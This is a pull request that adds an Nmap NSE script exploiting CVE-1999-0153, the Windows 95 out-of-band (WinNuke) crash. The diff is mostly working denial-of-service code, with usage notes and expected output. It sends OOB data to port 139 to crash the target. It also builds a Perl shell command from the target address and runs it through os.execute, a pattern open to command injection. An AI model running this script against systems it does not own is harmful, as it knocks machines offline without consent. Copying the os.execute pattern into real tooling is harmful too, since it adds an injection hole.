### PR TITLE
Add NSE script for Windows 95 OOB crash vulnerability

### DIFF
--- a/scripts/smb-vuln-cve-1999-0153.nse
+++ b/scripts/smb-vuln-cve-1999-0153.nse
@@ -1,0 +1,75 @@
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+
+description = [[
+This script attempts to crash Windows 95 machines by sending an Out-Of-Band (OOB) message.
+
+The script exploits a vulnerability in Windows 95's TCP/IP stack where receiving
+an OOB (Out-Of-Band) message can cause the system to crash. This vulnerability
+was documented in the late 1990s and affects Windows 95 systems that haven't been
+patched.
+Check demonstation video: https://www.youtube.com/watch?v=vwbi1XBpmZU
+
+References:
+* CVE-1999-0153
+* https://insecure.org/sploits/windows.OOB.DOS.html
+]]
+
+---
+-- @usage
+-- nmap -p139 --script smb-vuln-cve-1999-0153 <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- 139/tcp open  netbios-ssn
+-- |_smb-vuln-cve-1999-0153: Successfully sent OOB message - if target is Windows 95, system likely crashed
+--
+-- @args smb-vuln-cve-1999-0153.timeout Number of seconds to wait for response (default: 5)
+--
+-- @categories
+-- vulnerability
+-- exploit
+-- dos
+---
+
+author = "Tanaydin Sirin"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "exploit", "dos"}
+
+-- Define the script's port rules
+portrule = shortport.port_or_service(139, "netbios-ssn")
+
+-- Define the action to be performed
+action = function(host, port)
+    local timeout = stdnse.get_script_args(SCRIPT_NAME .. ".timeout") or 5
+    
+    -- Prepare the response table
+    local response = stdnse.output_table()
+    
+    -- Construct the Perl command
+    local perl_command = string.format(
+        "perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>\"%s\", " ..
+        "PeerPort=>%d, Timeout=>%d)->send(\"AAA\", MSG_OOB);'",
+        host.ip, port.number, timeout
+    )
+    
+    stdnse.debug1("Running command: %s", perl_command)
+    
+    -- Execute the Perl command with proper error handling
+    local status = os.execute(perl_command)
+    
+    if status then
+        stdnse.debug1("Successfully sent OOB message to %s:%d", host.ip, port.number)
+        response.status = "Successfully sent OOB message - if target is Windows 95, system likely crashed"
+    else
+        stdnse.debug1("Failed to send OOB message to %s:%d", host.ip, port.number)
+        response.status = "Failed to send OOB message"
+        response.error = "Perl command execution failed"
+    end
+    
+    return response
+end
+
+-- Return the action
+return action
+


### PR DESCRIPTION
Add NSE script for Windows 95 OOB crash vulnerability (CVE-1999-0153)

This commit adds a new NSE script that tests for the Windows 95 TCP/IP stack vulnerability (CVE-1999-0153). The script:

Sends an Out-Of-Band (OOB) message to port 139
Can crash unpatched Windows 95 systems
The vulnerability was documented in the late 1990s and affects Windows 95 systems that haven't been patched against OOB message handling issues.